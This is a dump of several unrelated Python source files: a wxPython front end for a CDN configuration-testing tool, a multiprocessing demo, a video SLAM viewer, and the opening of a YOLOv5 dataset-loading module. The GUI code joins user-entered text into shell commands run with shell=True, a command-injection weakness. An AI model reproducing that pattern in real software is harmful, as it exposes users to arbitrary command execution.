elif (default_bind == "Integer,String"):
self.Bind(wx.EVT_BUTTON, lambda event: self.toggle_int_comma_string_condition(event))
elif (default_bind == "YorN"):
self.Bind(wx.EVT_BUTTON, lambda event: self.toggle_integral_y_or_n_condition(event))
elif (default_bind == "String"):
self.Bind(wx.EVT_BUTTON, lambda event: self.toggle_string_condition(event))
snoring_threads = {}
window = None
hidden_label = None
label_populatedaccountname = None
label_populatedaccountname_locked = False
txtctrl_switchkey = None
txtctrl_contractid = None
combo_contractid = None
label_populatedcontractid = None
combo_populatedcontractid_locked = False
txtctrl_groupid = None
label_groupid = None
label_populatedgroupid = None
combo_populatedgroupid_locked = False
button_test_pragmas = None
def update_continuously(evt, l):
if (l != None):
p = l.GetPosition()
p.x = p.x + 1
p.y = p.y + 1
if (p.y > 10):
p.x = 0
p.y = 0
l.SetPosition((p.x,p.y))
    return None
def snore_continuously(l):
l.SetLabel("")
while l in snoring_threads:
try:
x = l.GetLabel()
x = "." + x
if (x == "..........."):
x = ""
l.SetLabel(x)
time.sleep(.5)
except:
time.sleep(.5)
def populate_property_id_nonblocking(arg=None):
global listbox_groupid
global listbox_propertyid
listbox_propertyid.Hide()
listbox_propertyid.Show()
if (listbox_groupid.GetSelection() == wx.NOT_FOUND):
wx.MessageBox("You must select a group id first.")
return None
t = threading.Thread(target=populate_property_id)
t.start()
def populate_property_id():
global property_dialog
global listbox_propertyid
global listbox_populatedpropertyid_locked
global label_populatedpropertyid
    selection = listbox_groupid.GetString(listbox_groupid.GetSelection())  # avoid shadowing the builtin str
    strlist = selection.split("\t")
if (len(strlist) < 3):
wx.MessageBox("ERROR! Invalid selection.")
return None
selectgroup = None
contractlist = []
count = 0
for ctr in strlist:
count = count + 1
if (count == 1):
selectgroup = ctr
if (count >= 3):
contractlist.append(ctr)
pprint.pprint(contractlist)
if (listbox_populatedpropertyid_locked == True):
return False
listbox_populatedpropertyid_locked = True
listbox_propertyid.Disable()
    if (label_populatedpropertyid in snoring_threads):
        # pop first so the snore loop exits, then join the previous thread
        t = snoring_threads.pop(label_populatedpropertyid)
        t.join()
t = threading.Thread(target=snore_continuously, args=[label_populatedpropertyid])
snoring_threads[label_populatedpropertyid] = t
t.start()
file_path = os.path.realpath('goatc.py')
full_output = "\n"
for ctr in contractlist:
cmd = file_path + " --cmd ACCOUNT_PROPERTIES --switchKey " + txtctrl_switchkey.GetValue() + " --groupId " + selectgroup + " --contractId " + ctr
p = Popen(cmd, stdout=PIPE, stderr=PIPE, shell=True)
stdout, stderr = p.communicate()
full_output = full_output + stdout.decode("utf-8") + "\n"
snoring_threads.pop(label_populatedpropertyid)
t.join()
listbox_propertyid.Hide()
listbox_propertyid.Show()
count = 0
try:
if (stderr.decode("utf-8") != ""):
label_populatedpropertyid.SetLabel("")
listbox_propertyid.Clear()
listbox_propertyid.Disable()
            wx.MessageBox(stderr.decode("utf-8"), "An Error Occurred")
else:
listbox_propertyid.Clear()
groups = full_output.split("\n")
for group in groups:
if (group != ""):
count = count + 1
listbox_propertyid.Append((group.replace("|","\t")))
listbox_propertyid.Enable()
finally:
listbox_populatedpropertyid_locked = False
label_populatedpropertyid.SetLabel("")
return True
def populate_group_id_nonblocking(arg=None):
global listbox_groupid
listbox_groupid.Hide()
listbox_groupid.Show()
t = threading.Thread(target=populate_group_id)
t.start()
def populate_group_id():
global property_dialog
global listbox_groupid
global listbox_populatedgroupid_locked
if (listbox_populatedgroupid_locked == True):
return False
listbox_populatedgroupid_locked = True
listbox_groupid.Disable()
    if label_populatedgroupid in snoring_threads:
        snoring_threads.pop(label_populatedgroupid).join()
t = threading.Thread(target=snore_continuously, args=[label_populatedgroupid])
snoring_threads[label_populatedgroupid] = t
t.start()
file_path = os.path.realpath('goatc.py')
    cmd = file_path + " --cmd ACCOUNT_GROUPS --switchKey " + txtctrl_switchkey.GetValue()
p = Popen(cmd, stdout=PIPE, stderr=PIPE, shell=True)
stdout, stderr = p.communicate()
snoring_threads.pop(label_populatedgroupid)
t.join()
listbox_groupid.Hide()
listbox_groupid.Show()
count = 0
try:
if (stderr.decode("utf-8") != ""):
label_populatedgroupid.SetLabel("")
listbox_groupid.Clear()
listbox_groupid.Disable()
            wx.MessageBox(stderr.decode("utf-8"), "An Error Occurred")
else:
listbox_groupid.Clear()
groups = stdout.decode("utf-8").split("\n")
for group in groups:
if (group != ""):
count = count + 1
listbox_groupid.Append(urllib.parse.unquote(group.replace("|","\t")))
listbox_groupid.Enable()
finally:
listbox_populatedgroupid_locked = False
label_populatedgroupid.SetLabel("")
return True
def populate_contract_id_nonblocking(arg=None):
global txtctrl_contractid
global combo_contractid
txtctrl_contractid.Hide()
txtctrl_contractid.Show()
combo_contractid.Hide()
combo_contractid.Show()
t = threading.Thread(target=populate_contract_id)
t.start()
def populate_contract_id():
global window
global combo_contractid
global combo_populatedcontractid_locked
if (combo_populatedcontractid_locked == True):
return False
combo_populatedcontractid_locked = True
combo_contractid.Disable()
    if label_populatedcontractid in snoring_threads:
        snoring_threads.pop(label_populatedcontractid).join()
t = threading.Thread(target=snore_continuously, args=[label_populatedcontractid])
snoring_threads[label_populatedcontractid] = t
t.start()
file_path = os.path.realpath('goatc.py')
    cmd = file_path + " --cmd ACCOUNT_CONTRACTS --switchKey " + txtctrl_switchkey.GetValue()
p = Popen(cmd, stdout=PIPE, stderr=PIPE, shell=True)
stdout, stderr = p.communicate()
snoring_threads.pop(label_populatedcontractid)
t.join()
combo_contractid.Hide()
combo_contractid.Show()
try:
if (stderr.decode("utf-8") != ""):
label_populatedcontractid.SetLabel("")
combo_contractid.Clear()
combo_contractid.Disable()
            wx.MessageBox(stderr.decode("utf-8"), "An Error Occurred")
else:
combo_contractid.Clear()
combo_contractid.Disable()
contracts = stdout.decode("utf-8").split("\n")
for contract in contracts:
if (contract != ""):
combo_contractid.Append(contract)
combo_contractid.Enable()
try:
combo_contractid.SetSelection(0)
finally:
label_populatedcontractid.SetLabel("")
finally:
combo_populatedcontractid_locked = False
return True
def populate_account_name_nonblocking(arg=None):
global txtctrl_switchkey
txtctrl_switchkey.Hide()
txtctrl_switchkey.Show()
t = threading.Thread(target=populate_account_name)
t.start()
def populate_account_name():
global window
global label_populatedaccountname
global label_populatedaccountname_locked
if (label_populatedaccountname_locked == True):
return False
label_populatedaccountname_locked = True
    if label_populatedaccountname in snoring_threads:
        snoring_threads.pop(label_populatedaccountname).join()
t = threading.Thread(target=snore_continuously, args=[label_populatedaccountname])
snoring_threads[label_populatedaccountname] = t
t.start()
file_path = os.path.realpath('goatc.py')
    cmd = file_path + " --cmd ACCOUNT_NAME --switchKey " + txtctrl_switchkey.GetValue()
p = Popen(cmd, stdout=PIPE, stderr=PIPE, shell=True)
stdout, stderr = p.communicate()
snoring_threads.pop(label_populatedaccountname)
t.join()
if (stderr.decode("utf-8") != ""):
label_populatedaccountname.SetLabel("")
        wx.MessageBox(stderr.decode("utf-8"), "An Error Occurred")
else:
label_populatedaccountname.SetLabel(stdout.decode("utf-8"))
label_populatedaccountname_locked = False
return True
def showme():
    contractId = get_input_args().args.contractid or ""
    groupId = get_input_args().args.groupid or ""
    propertyId = get_input_args().args.propertyid or ""
    versionId = get_input_args().args.versionid or ""
app = wx.App()
global window
window = wx.Frame(None, title="GOATC UI", size=(650, 475), pos=(50,50))
panel = wx.Panel(window)
global hidden_label
hidden_label = wx.StaticText(panel, label="", pos=(0, 0))
hidden_label.Hide()
window.timer = wx.Timer(window)
window.timer.Start(100)
#window.Bind(wx.EVT_TIMER, lambda evt, temp = hidden_label: update_continuously(evt, temp))
#button_accountname = wx.Button(panel, label="Account Name ", pos=(125, 10), size=(105,20), style=wx.BU_LEFT)
#button_accountname.Bind(wx.EVT_BUTTON, populate_account_name_nonblocking)
global txtctrl_switchkey
    current_key = get_api_client().current_switchkey or ""
txtctrl_switchkey = wx.TextCtrl(panel, value=current_key, pos=(10, 30))
label_switchkey = wx.StaticText(panel, label="Switch Key", pos=(10, 10))
#global label_populatedaccountname
#label_populatedaccountname = wx.StaticText(panel, label="* click [Account Name]", pos=(125, 30))
label_contractid = wx.StaticText(panel, label="Contract Id", pos=(10, 60))
#button_contractid = wx.Button(panel, label="Contract Id List ", pos=(125, 60), size=(130,20), style=wx.BU_LEFT)
#button_contractid.Bind(wx.EVT_BUTTON, populate_contract_id_nonblocking)
global txtctrl_contractid
txtctrl_contractid = wx.TextCtrl(panel, value=contractId, pos=(10, 80))
#global combo_contractid
#combo_contractid = wx.ComboBox(panel, 1, style=wx.CB_DROPDOWN | wx.CB_READONLY, size=(125,25), pos=(125,79))
#combo_contractid.Append("* click [Contract Id List]")
#combo_contractid.SetSelection(0)
#combo_contractid.Disable()
#global label_populatedcontractid
#label_populatedcontractid = wx.StaticText(panel, label="", pos=(125, 92))
global label_groupid
label_groupid = wx.StaticText(panel, label="Group Id", pos=(10, 110))
global txtctrl_groupid
txtctrl_groupid = wx.TextCtrl(panel, value=groupId, pos=(10, 130))
#button_groupid = wx.Button(panel, label="Group Id List ", pos=(125, 110), size=(130,20), style=wx.BU_LEFT)
#button_groupid.Bind(wx.EVT_BUTTON, populate_group_id_nonblocking)
#global combo_groupid
#combo_groupid = wx.ComboBox(panel, 1, style=wx.CB_DROPDOWN | wx.CB_READONLY, size=(125,25), pos=(125,129))
#combo_groupid.Append("* click [Group Id List]")
#combo_groupid.SetSelection(0)
#combo_groupid.Disable()
#global label_populatedgroupid
#label_populatedgroupid = wx.StaticText(panel, label="", pos=(125, 142))
label_propertyid = wx.StaticText(panel, label="Property Id", pos=(10, 160))
txtctrl_propertyid = wx.TextCtrl(panel, value=propertyId, pos=(10, 180))
label_propertyid = wx.StaticText(panel, label="Version Id", pos=(10, 210))
txtctrl_propertyid = wx.TextCtrl(panel, value=versionId, pos=(10, 230))
button_propertyselector = wx.Button(panel, label="Select Other\nProperty", pos=(10, 260), size=(105,40))
button_propertyselector.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_propertyselector.Bind(wx.EVT_BUTTON, select_other_property)
button_propertyselector = wx.Button(panel, label="Use This\nProperty", pos=(10, 300), size=(105,40))
button_propertyselector.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_accountinfo = wx.Button(panel, label="Show Helpful\nInformation", pos=(10, 340), size=(105,40))
button_accountinfo.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
label_cfgfile = wx.StaticText(panel, label="Configuration file:", pos=(130, 10))
label_cfgfilevalue = wx.StaticText(panel, label="[click Use This Property]", pos=(240, 10))
label_vars = wx.StaticText(panel, label="Vars:", pos=(130, 264+10))
list_vars = wx.ListBox(panel, 1, style=wx.LB_MULTIPLE, size=(225,60), pos=(130,280+10))
    button_equalsvar = wx.Button(panel, label="Equals", pos=(165, 21+10), size=(48,500))
button_equalsvar.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_novar = wx.Button(panel, label="NoVAR", pos=(213, 21+10), size=(48,500))
button_novar.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_noval = wx.Button(panel, label="NoVAL", pos=(261, 21+10), size=(48,500))
button_noval.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_delvar = wx.Button(panel, label="D", pos=(308, 21+10), size=(25,500))
button_delvar.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_clrvar = wx.Button(panel, label="C", pos=(332, 21+10), size=(23,500))
button_clrvar.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
label_rsphdrs = wx.StaticText(panel, label="Rsp hdrs:", pos=(360, 264+10))
list_rsphdrs = wx.ListBox(panel, 1, style=wx.LB_MULTIPLE, size=(230,60), pos=(360,280+10))
button_addrsphdr = wx.Button(panel, label="Add", pos=(420, 21+10), size=(40,500))
button_addrsphdr.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_missrsphdr = wx.Button(panel, label="Miss", pos=(460, 21+10), size=(40,500))
button_missrsphdr.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_delrsphdr = wx.Button(panel, label="Del", pos=(500, 21+10), size=(40,500))
button_delrsphdr.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_clearrsphdr = wx.Button(panel, label="Clear", pos=(540, 21+10), size=(50,500))
button_clearrsphdr.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
label_hostnames = wx.StaticText(panel, label="Hostnames:", pos=(130, 32))
label_populatedhostnames = wx.StaticText(panel, label="...", pos=(130, 37))
list_hostnames = wx.ListBox(panel, 1, style=wx.LB_MULTIPLE, size=(225,75), pos=(130,53))
button_hostnames = wx.Button(panel, label="Unselect All", pos=(210, 21), size=(145,40))
button_hostnames.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
label_hostnames = wx.StaticText(panel, label="Req hdrs:", pos=(360, 32))
#label_populatedheaders = wx.StaticText(panel, label="...", pos=(360, 37))
list_headers = wx.ListBox(panel, 1, style=wx.LB_MULTIPLE, size=(230,75), pos=(360,53))
button_addheader = wx.Button(panel, label="Add", pos=(420, 21), size=(40,40))
button_addheader.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_modheader = wx.Button(panel, label="Mod", pos=(460, 21), size=(40,40))
button_modheader.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_delheader = wx.Button(panel, label="Del", pos=(500, 21), size=(40,40))
button_delheader.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_clearheader = wx.Button(panel, label="Clear", pos=(540, 21), size=(50,40))
button_clearheader.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_test_status = GoatcButton(panel, label="STATUS=___", pos=(130, 120), size=(80, 40), default_bind="Integer")
button_test_status.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_test_cpcode = GoatcButton(panel, label="CPCODE=__________", pos=(210, 120), size=(120, 40), default_bind="Integer")
button_test_cpcode.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_test_sureroute = GoatcButton(panel, label="SUREROUTE", pos=(330, 120), size=(80, 40))
button_test_sureroute.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_test_sureroute = GoatcButton(panel, label="PREFETCH", pos=(410, 120), size=(80, 40))
button_test_sureroute.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_test_gzip = GoatcButton(panel, label="GZIP", pos=(490, 120), size=(40, 40))
button_test_gzip.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_test_nostore = GoatcButton(panel, label="NOSTOR", pos=(530, 120), size=(60, 40))
button_test_nostore.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_test_redirect = GoatcButton(panel, label="REDIRECT=___,_________________________________________________________", pos=(130, 142), size=(360, 40),default_bind="Integer,String")
button_test_redirect.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_test_cache = GoatcButton(panel, label="CACHE=__,______", pos=(490, 142), size=(100, 40),default_bind="Integer,String")
button_test_cache.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_test_bypass = GoatcButton(panel, label="BYPASS", pos=(130, 164), size=(60, 40))
button_test_bypass.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_test_exclude = GoatcButton(panel, label="EXCLUDEPARAMS", pos=(190, 164), size=(100, 40))
button_test_exclude.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_test_logrefer = GoatcButton(panel, label="LOGREFER=_", pos=(290, 164), size=(80, 40),default_bind="YorN")
button_test_logrefer.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_test_loghost = GoatcButton(panel, label="LOGHOST=_", pos=(370, 164), size=(75, 40),default_bind="YorN")
button_test_loghost.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_test_loglang = GoatcButton(panel, label="LOGLANG=_", pos=(445, 164), size=(75, 40),default_bind="YorN")
button_test_loglang.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_test_keycontains = GoatcButton(panel, label="KEYCONTAINS=_________________________________________________________", pos=(130, 186), size=(360, 40),default_bind="String")
button_test_keycontains.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_test_logcook = GoatcButton(panel, label="LOGCUSTOM=_", pos=(490, 164), size=(100, 83),default_bind="YorN")
button_test_logcook.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_test_logcook = GoatcButton(panel, label="LOGCOOKIES=_", pos=(490, 208), size=(100, 40),default_bind="YorN")
button_test_logcook.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_test_keyomits = GoatcButton(panel, label="KEYOMITS=_________________________________________________________", pos=(130, 208), size=(360, 40),default_bind="String")
button_test_keyomits.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_test_hardcode = GoatcButton(panel, label="HARDCODE=_________________________________________________________", pos=(130, 230), size=(360, 40),default_bind="String")
button_test_hardcode.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_test_secpolicy = GoatcButton(panel, label="SECPOL=________", pos=(490, 208), size=(100, 40),default_bind="String")
button_test_secpolicy.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_test_notd = GoatcButton(panel, label="NOTD", pos=(490, 230), size=(100, 40))
button_test_notd.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
voffset = 25
label_paths = wx.StaticText(panel, label="Request path (not including hostname):", pos=(130, 355))
txtctrl_path = wx.TextCtrl(panel, value="/", pos=(375, 353), size=(215,22))
button_addtest = wx.Button(panel, label="Update Test Script List", pos=(130, 380+voffset), size=(170, 40))
button_addtest.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_cleartest = wx.Button(panel, label="Reset Form", pos=(300, 380+voffset), size=(100, 40))
button_cleartest.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_cleartest.Bind(wx.EVT_BUTTON, reset_form)
button_savetest = wx.Button(panel, label="Save", pos=(400, 380+voffset), size=(40, 40))
button_savetest.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_copytest = wx.Button(panel, label="Copy", pos=(440, 380+voffset), size=(40, 40))
button_copytest.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_runtest = wx.Button(panel, label="Load", pos=(480, 380+voffset), size=(40, 40))
button_runtest.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_goatc = wx.Button(panel, label="GO ATC!", pos=(520, 380+voffset), size=(70, 40))
button_goatc.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
combo_templates = wx.ComboBox(panel, 1, style=wx.CB_DROPDOWN | wx.CB_READONLY, size=(325,25), pos=(130,358+voffset))
button_templates = wx.Button(panel, label="Apply Template Instead", pos=(460, 350+voffset), size=(130, 40))
button_templates.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
global button_test_pragmas
button_test_pragmas = wx.CheckBox(panel, label="PRAGMAS", pos=(522, 164), size=(95, 40))
button_test_pragmas.SetFont(wx.Font(10, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
window.Show(True)
app.MainLoop()
    while snoring_threads:
        try:
            # popitem() avoids mutating the dict while iterating over it
            _, th = snoring_threads.popitem()
            th.join()
        except Exception:
            print_err("Cleaning up threads...\n")
util.die(0, "UI window closed. Exiting gracefully.")
|
mp.py | import multiprocessing as mp
def foo(q):
q.put('hello')
if __name__ == '__main__':
mp.set_start_method('spawn')
q = mp.Queue()
p = mp.Process(target=foo, args=(q,))
p.start()
print(q.get())
p.join() |
jslam.py | #! /home/johk/anaconda3/envs/slam/bin/python
import cv2
import numpy as np
from matplotlib import pyplot as plt
from Components.display import Display
from Components.display3 import D3Engine
import keyboard
import time
from threading import Thread
if __name__ == "__main__":
start_time = time.time()
cap = cv2.VideoCapture("videos/fastcar.mp4")
H = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT)) // 2
W = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH)) // 2
# extractor = Extractor()
display = Display(W, H)
engine3D = D3Engine()
threads = []
    while True:
# Capture frame by frame and scale it down
ret, frame = cap.read()
if keyboard.is_pressed("q") or not ret:
print("Quitting")
print("Program ran for {} Seconds".format(int(time.time() - start_time)))
break
frame = cv2.resize(frame, (W, H), interpolation=cv2.INTER_LINEAR)
# Our operations on the frame come here
# rgb = cv2.cvtColor(frame, cv2.COLOR_RGBA2RGB)
# Imshow not working on the current opencv version
# cv2.imshow('frame', rgb)
display.displayVideo(frame)
if not threads:
process = Thread(target=engine3D.display)
process.start()
threads.append(process)
# When everything done, release the capture
print("Cleaning up....")
display.cleanUp()
# cap.release()
# cv2.destroyAllWindows()
|
datasets.py | # Dataset utils and dataloaders
import glob
import logging
import math
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import ThreadPool
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
import torch.nn.functional as F
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from utils.general import check_requirements, xyxy2xywh, xywh2xyxy, xywhn2xyxy, xyn2xy, segment2box, segments2boxes, \
resample_segments, clean_str
from utils.torch_utils import torch_distributed_zero_first
# Parameters
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['bmp', 'jpg', 'jpeg', 'png', 'tif', 'tiff', 'dng', 'webp', 'mpo'] # acceptable image suffixes
vid_formats = ['mov', 'avi', 'mp4', 'mpg', 'mpeg', 'm4v', 'wmv', 'mkv'] # acceptable video suffixes
logger = logging.getLogger(__name__)
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(files):
# Returns a single hash value of a list of files
return sum(os.path.getsize(f) for f in files if os.path.isfile(f))
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
    except Exception:
        pass  # image has no EXIF data or no orientation tag
return s
def create_dataloader(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False,
rank=-1, world_size=1, workers=8, image_weights=False, quad=False, prefix=''):
# Make sure only the first process in DDP process the dataset first, and the following others can use the cache
with torch_distributed_zero_first(rank):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=opt.single_cls,
stride=int(stride),
pad=pad,
image_weights=image_weights,
prefix=prefix)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count() // world_size, batch_size if batch_size > 1 else 0, workers]) # number of workers
sampler = torch.utils.data.distributed.DistributedSampler(dataset) if rank != -1 else None
loader = torch.utils.data.DataLoader if image_weights else InfiniteDataLoader
# Use torch.utils.data.DataLoader() if dataset.properties will update during training else InfiniteDataLoader()
dataloader = loader(dataset,
batch_size=batch_size,
num_workers=nw,
sampler=sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn4 if quad else LoadImagesAndLabels.collate_fn)
return dataloader, dataset
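# Illustrative usage sketch (not part of the original file): one plausible
# way to call create_dataloader for single-process training. The Namespace
# fields and the dataset path below are assumptions for illustration only.
def _example_create_dataloader():
    from argparse import Namespace
    opt = Namespace(single_cls=False)  # hypothetical minimal options object
    dataloader, dataset = create_dataloader(
        '../coco128/images/train2017',  # hypothetical dataset location
        imgsz=640, batch_size=16, stride=32, opt=opt,
        rank=-1, world_size=1, workers=4, prefix='train: ')
    imgs, targets, paths, shapes = next(iter(dataloader))  # one smoke-test batch
    return imgs.shape, targets.shape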
class InfiniteDataLoader(torch.utils.data.dataloader.DataLoader):
""" Dataloader that reuses workers
Uses same syntax as vanilla DataLoader
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
class _RepeatSampler(object):
""" Sampler that repeats forever
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
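# Illustrative sketch: _RepeatSampler just re-yields its wrapped sampler
# forever, which is what lets InfiniteDataLoader keep its worker processes
# alive across epochs instead of respawning them. A toy example, with a
# plain list standing in for a real Sampler:
def _example_repeat_sampler():
    it = iter(_RepeatSampler([0, 1, 2]))
    return [next(it) for _ in range(6)]  # -> [0, 1, 2, 0, 1, 2]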
class LoadImages: # for inference
def __init__(self, path, img_size=640, stride=32):
p = str(Path(path).absolute()) # os-agnostic absolute path
if '*' in p:
files = sorted(glob.glob(p, recursive=True)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception(f'ERROR: {p} does not exist')
images = [x for x in files if x.split('.')[-1].lower() in img_formats]
videos = [x for x in files if x.split('.')[-1].lower() in vid_formats]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.stride = stride
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'image'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, f'No images or videos found in {p}. ' \
f'Supported formats are:\nimages: {img_formats}\nvideos: {vid_formats}'
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print(f'video {self.count + 1}/{self.nf} ({self.frame}/{self.nframes}) {path}: ', end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print(f'image {self.count}/{self.nf} {path}: ', end='')
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return path, img, img0, self.cap
def new_video(self, path):
